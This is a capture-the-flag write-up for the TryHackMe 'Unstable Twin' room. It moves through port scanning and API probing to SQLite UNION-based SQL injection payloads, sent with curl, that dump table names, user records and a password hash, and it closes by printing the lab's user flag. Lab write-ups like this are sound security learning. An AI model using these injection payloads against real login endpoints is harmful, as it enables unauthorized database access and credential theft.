Tryhackme - Unstable Twin
Starting with the usual Nmap scan, we discover that only 2 ports are open.
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
| 3072 ba:a2:40:8e:de:c3:7b:c7:f7:b3:7e:0c:1e:ec:9f:b8 (RSA)
| 256 38:28:4c:e1:4a:75:3d:0d:e7:e4:85:64:38:2a:8e:c7 (ECDSA)
|_ 256 1a:33:a0:ed:83:ba:09:a5:62:a7:df:ab:2f:ee:d0:99 (ED25519)
80/tcp open http nginx 1.14.1
|_http-server-header: nginx/1.14.1
On running the gobuster scan we get 2 directories /api (with status 404) and /info (with status 200) which tells us that the login API needs to be called with username and password on visiting /info .
To get the build version we send a request to /info
curl -i -s
However it returned 1.3.6-final (which did not turn out to be the correct answer),so I thought it is some machine error and so I sent the request again and (much to my bewilderment) got a different build version.
After this I sent a request to the login API with an arbitrary username and password as directed in /info and got the result that the credentials are incorrect
curl -XPOST '' -d 'username=admin&password=admin'
"The username or password passed are not correct."
The box has an SQLi tag so i decided to try exploiting it in that direction and tried to list our the table names in the sqlite_master database. Basically sqlite_master is the master listing of all database objects in the database and the SQL used to create each object. The sqlite_master contains the following columns:
The sqlite_master table contains the following columns:
Column Description
type The type of database object such as table, index, trigger or view.
name The name of the database object.
tbl_name The table name that the database object is associated with.
rootpage Root page.
sql SQL used to create the database object.
So I basically have to display the information stored in tbl_name column. Here’s my request:
curl -XPOST '' -d "username=1'UNION SELECT 1,group_concat(tbl_name) from sqlite_master where type='table' -- -&password=admin"
Now sqlite_sequence is one of the default tables present in SQL ,so it is not probably not important right now. So I list out the data in the users table :
curl -XPOST '' -d "username=1' UNION SELECT username,password from users -- -&password=admin"
"Yellow "
But Mary Anns’ password is not listed here so i proceed to similarly list the information in the notes table:
curl -XPOST '' -d "username=1'UNION SELECT 1,notes from notes -- - -- -&password=admin"
"I have left my notes on the server. They will me help get the family back together. "
"My Password is eaf0651dabef9c7de8a70843030924d335a2a8ff5fd1b13c4cb099e66efe25ecaa607c4b7dd99c43b0c01af669c90fd6a14933422cf984324f645b84427343f4\n"
Seems like a hash,right? So I proceed to crack the hash online using Crackstation and get the SSH password.
After this I log in via SSH and retieve the User Flag.
User Flag : THM{Mary_Ann_notes}